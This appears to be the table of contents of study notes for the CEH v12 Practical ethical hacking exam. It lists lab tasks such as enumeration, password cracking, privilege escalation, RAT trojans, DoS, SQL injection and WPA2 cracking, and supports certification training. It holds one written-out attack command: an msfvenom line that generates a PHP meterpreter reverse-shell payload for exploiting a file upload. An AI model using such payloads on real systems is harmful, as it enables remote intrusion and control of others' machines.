CEH-Notes

CEH-v12-Practical

Host discovery

Port and Service Discovery

OS Discovery

Enumeration

NetBIOS, SNMP, LDAP, NFS, DNS, SMTP, RPC, SMB, FTP

NetBIOS enumeration using nbstat

NetBIOS enumeration using NSE Script

Enumerate SNMP using snmp-check

Enumerate SNMP using NSE

Vulnerability Analysis

OpenVAS, Nessus, Nikto

Perform Vulnerability Analysis using OpenVAS

Perform Web Servers and Applications Vulnerability Scanning using Nikto

System Hacking

Perform Active Online Attack to Crack the System’s Password using Responder

Escalate privileges using privilege escalation tools…

Hack a Windows Machine using Metasploit and perform post-exploitation using Meterpreter

Escalate privileges by exploiting vulnerability in pkexec

Escalate privileges by bypassing UAC and exploiting sticky keys

Escalate privileges to gather hashdump using Mimikatz

Hide data using white space steganography

Image steganography using OpenStego and StegOnline

Covert Channels using Covert_TCP

Malware Threat

Gain control over a victim machine using njRAT RAT Trojan

Create a Trojan server ussing Theef RAT Trojan

Perform a string search using BinText

Analyze File using Detect It Easy (DIE)

Module 08: Sniffing

** Password Sniffing using Wireshark**

Module 10: Denial-of-Service

Perform a DoS Attack on a Target Host using hping3

Module 11: Session Hijacking

Detect Session Hijacking using Wireshark

Module 13: Hacking Web Servers

Crack FTP Credentials using a Dictionary Attack

Other

Module 14: Hacking Web Applications

Identify Web Server Directories using various tools

Perform a Brute-force Attack using Burp Suite

Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications

Enumerate and Hack a Web Application using WPScan and Metasploit

Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server (DVWA low level security)

https://www.scribd.com/document/662376180/CEH-v12-LabManual-p04

Exploit a file upload vulnerability at different security levels msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw

Module 15: SQL Injection

Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap

Module 16: Hacking Wireless Networks

Crack a WPA2 Network using Aircrack-ng

Module 17: Hacking Mobile Platforms

Lab 1-Task 4: Exploit the Android Platform through ADB using PhoneSploit

Module 18: IoT and OT Hacking

Lab 2-Task 1: Capture and Analyze IoT traffic using Wireshark

Module 20: Cryptography

Lab4-Task1: Perform Disk Encryption using VeraCrypt

Appendix: Covered Tools

Importan keywords

Example questions and walkthroughs